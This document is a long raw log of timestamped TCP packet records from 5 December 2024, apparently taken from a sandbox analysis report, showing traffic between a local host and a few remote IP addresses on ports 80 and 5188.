                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.835161924 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.835309029 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.835366011 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.837112904 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.837167025 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.837235928 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.837274075 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.839185953 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.839330912 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.839382887 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.841428041 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.841489077 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.841860056 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.843447924 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.843503952 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.843544006 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.843579054 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.845556021 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.845607996 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.845683098 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.845717907 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.847652912 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.847703934 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.847821951 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.847862959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.849709034 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.849757910 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.850121021 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.850198984 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.850260019 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.850575924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.850835085 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.850877047 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.850917101 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.852004051 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.852057934 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.852122068 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.853168011 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.853256941 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.853534937 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.854309082 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.854322910 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.854451895 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.855493069 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.855554104 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.855637074 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.856542110 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.856575966 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.856673002 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.857678890 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.857738018 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.857795000 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.858807087 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.858953953 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.859302044 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.860100985 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.860146999 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.860191107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.861099958 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.861190081 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.861475945 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.862231970 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.862499952 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.862519979 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.863455057 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.863523960 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.863619089 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.864484072 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.865675926 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.865691900 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.865704060 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.865741968 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.865741968 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.866782904 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.867047071 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.867378950 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.868010998 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.868052959 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.868128061 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.869180918 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.869270086 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.869297028 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.870227098 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.870379925 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.870698929 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.871454954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.871625900 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.871675968 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.872471094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.872550011 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.872632027 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.873647928 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.873728991 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.873755932 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.874721050 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.874816895 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.875094891 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.875897884 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.876024008 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.876112938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.876995087 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.877027035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.877057076 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.878180027 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.878295898 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.878341913 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.879345894 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.879628897 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.879709959 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.880429983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.880481958 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.881179094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.881598949 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.881638050 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.881642103 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.883086920 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.883207083 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.883528948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.884124041 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.884170055 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.884213924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.885004997 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.885107040 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.885221004 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.886169910 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.886337996 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.886395931 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.887290955 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.887363911 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.887492895 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.888523102 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.888979912 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.889050007 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.889589071 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.889647961 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.889784098 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.890758038 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.890902042 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.890913963 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.891804934 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.891902924 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.891988039 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.892987013 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.893104076 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.893229008 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.894118071 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.894520998 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.894577980 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.895204067 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.895322084 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.895541906 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.896348000 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.896399021 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.896739006 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.897471905 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.897524118 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.897660971 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.898646116 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.898844004 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.899036884 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.899748087 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.899801970 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.899808884 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.900904894 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.900948048 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.900953054 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.902100086 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.902198076 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.902244091 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.903309107 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.903350115 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.903402090 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.904309034 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.904364109 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.904568911 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.905471087 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.905519009 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.905582905 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.906627893 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.906740904 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.906764984 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.907742023 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.907793045 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.908025980 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.908869028 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.908932924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.909127951 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.955570936 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.957730055 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.960712910 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.960779905 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.960859060 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.961571932 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.961627007 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.961675882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.961739063 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.963643074 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.963785887 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.963840961 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.965245962 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.965298891 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.965424061 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.965465069 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.966835976 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.967341900 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.967391014 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.968458891 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.968502045 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.968602896 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.968640089 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.970117092 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.970431089 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.970473051 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.971801043 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.971843958 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.971997023 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.972170115 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.973382950 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.973433018 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.973901033 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.974971056 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.975023031 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.975121975 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.975161076 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.976641893 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.976690054 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.976715088 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.976747990 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.978223085 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.978327036 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.978374958 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.979824066 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.979871035 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.980036974 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.980073929 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.981626987 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.981678009 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.981754065 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.983062029 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.983078003 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.983109951 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.983136892 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.984649897 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.985018969 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.985069990 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.986269951 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.986372948 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.986426115 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.988159895 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.988217115 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.988255978 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.988295078 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.989516020 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.989594936 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.989681005 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.989716053 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.991113901 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.991202116 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.991249084 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.992769957 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.992826939 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.992899895 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.992938995 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.994435072 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.994530916 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.994580030 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:13.995965958 CET8049793185.215.113.84192.168.2.11
